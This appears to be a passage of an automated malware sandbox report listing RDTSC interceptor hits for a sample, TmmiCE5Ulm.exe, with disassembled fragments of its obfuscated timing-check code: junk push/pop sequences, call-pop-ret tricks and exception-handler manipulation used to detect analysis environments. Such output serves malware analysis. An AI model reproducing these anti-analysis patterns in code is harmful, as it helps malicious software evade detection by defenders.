                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F7521 second address: 8F7525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F7525 second address: 8F752B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FDECF second address: 8FDED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FDED3 second address: 8FDF5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F05F0F59498h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F05F0F59498h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+1247195Ch], ecx 0x00000033 push 00000000h 0x00000035 mov edi, esi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F05F0F59498h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov di, si 0x00000056 jmp 00007F05F0F594A1h 0x0000005b mov dword ptr [ebp+122D1F07h], ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007F05F0F5949Ch 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FDF5E second address: 8FDF71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FEDD7 second address: 8FEE25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F05F0F594A0h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 sub bl, FFFFFF81h 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov esi, dword ptr [ebp+122D26FAh] 0x0000001f xor ebx, dword ptr [ebp+122D2FD1h] 0x00000025 popad 0x00000026 mov di, dx 0x00000029 push 00000000h 0x0000002b mov ebx, dword ptr [ebp+122D3977h] 0x00000031 mov di, dx 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F05F0F5949Ch 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FEE25 second address: 8FEE2F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F4975Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FFEAE second address: 8FFEB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900F84 second address: 900F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900F88 second address: 900F92 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900F92 second address: 900FB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F49762h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900FB0 second address: 900FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 902F0F second address: 902F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 902F15 second address: 902F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FD1E4 second address: 8FD1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FFFCA second address: 8FFFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9010D5 second address: 901138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+12460D09h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F05F0F49758h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov edi, 61011093h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 cmc 0x00000041 mov eax, dword ptr [ebp+122D04F5h] 0x00000047 push FFFFFFFFh 0x00000049 pushad 0x0000004a sub dword ptr [ebp+124719C9h], ebx 0x00000050 popad 0x00000051 nop 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 js 00007F05F0F49756h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90314D second address: 903153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 905537 second address: 905555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F49765h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 903153 second address: 903175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9057F8 second address: 905802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F05F0F49756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 903175 second address: 903179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 905802 second address: 905806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 903179 second address: 90317F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9075D2 second address: 9075DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F05F0F49756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9083A9 second address: 9083AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9083AD second address: 9083B7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05F0F49756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9085A4 second address: 9085B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90952C second address: 909535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 909535 second address: 909539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90B511 second address: 90B515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 909539 second address: 90954F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F05F0F5949Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90C3C6 second address: 90C43B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05F0F49767h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+12451BA9h], esi 0x00000016 push 00000000h 0x00000018 or bx, F3EAh 0x0000001d mov ebx, dword ptr [ebp+122D2DF9h] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F05F0F49758h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov ebx, dword ptr [ebp+122D3798h] 0x00000045 xchg eax, esi 0x00000046 jnc 00007F05F0F4975Ch 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jc 00007F05F0F49756h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90B515 second address: 90B519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90954F second address: 909555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90C43B second address: 90C440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90B519 second address: 90B5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2682h], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 add edi, 152BCD00h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F05F0F49758h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000015h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov edi, dword ptr [ebp+122D2F55h] 0x00000044 mov dword ptr [ebp+122D2757h], ecx 0x0000004a mov eax, dword ptr [ebp+122D0911h] 0x00000050 push 00000000h 0x00000052 push esi 0x00000053 call 00007F05F0F49758h 0x00000058 pop esi 0x00000059 mov dword ptr [esp+04h], esi 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc esi 0x00000066 push esi 0x00000067 ret 0x00000068 pop esi 0x00000069 ret 0x0000006a mov edi, ecx 0x0000006c push FFFFFFFFh 0x0000006e js 00007F05F0F49759h 0x00000074 mov di, si 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b pushad 0x0000007c popad 0x0000007d push ecx 0x0000007e pop ecx 0x0000007f popad 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 909555 second address: 909559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90B5A2 second address: 90B5BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F05F0F49756h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007F05F0F49758h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 909559 second address: 90955D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90B5BC second address: 90B5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 914611 second address: 914617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 914617 second address: 914630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F4975Bh 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F05F0F49756h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 914630 second address: 914636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 918190 second address: 918194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 917844 second address: 917848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9179BB second address: 9179C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F05F0F49756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9179C5 second address: 9179E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A8h 0x00000007 jng 00007F05F0F59496h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9179E7 second address: 9179EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 917B5A second address: 917B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 917B64 second address: 917B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F49762h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 917B7A second address: 917B84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 917B84 second address: 917BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F05F0F49765h 0x0000000a ja 00007F05F0F49756h 0x00000010 jne 00007F05F0F49756h 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 91BABA second address: 91BAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92449A second address: 9244C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05F0F4975Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9244C0 second address: 9244C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9244C4 second address: 9244DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F05F0F49760h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9244DE second address: 9244EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F05F0F59496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9244EA second address: 9244F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9244F2 second address: 9244FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92494C second address: 924950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 924950 second address: 924971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 924971 second address: 924982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F4975Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 924BF2 second address: 924BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 929ED0 second address: 929ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 929ED8 second address: 929EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 929EDC second address: 929EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A177 second address: 92A17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A2D0 second address: 92A2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A2D6 second address: 92A306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A5h 0x00000007 jmp 00007F05F0F594A7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A62A second address: 92A63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A63B second address: 92A641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A641 second address: 92A646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A646 second address: 92A661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F05F0F594A4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A7C7 second address: 92A7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A7CB second address: 92A7D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A93E second address: 92A94B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05F0F49756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92A94B second address: 92A985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F05F0F5949Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F05F0F59498h 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F05F0F594B0h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 92ADB4 second address: 92ADBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 930E0B second address: 930E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 930E12 second address: 930E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F05F0F49756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 93007F second address: 930085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 930085 second address: 93009D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F49760h 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 93009D second address: 9300AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F05F0F59496h 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9300AA second address: 9300C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F05F0F49756h 0x00000012 jmp 00007F05F0F4975Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9300C8 second address: 9300CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9300CC second address: 9300DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F05F0F4975Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
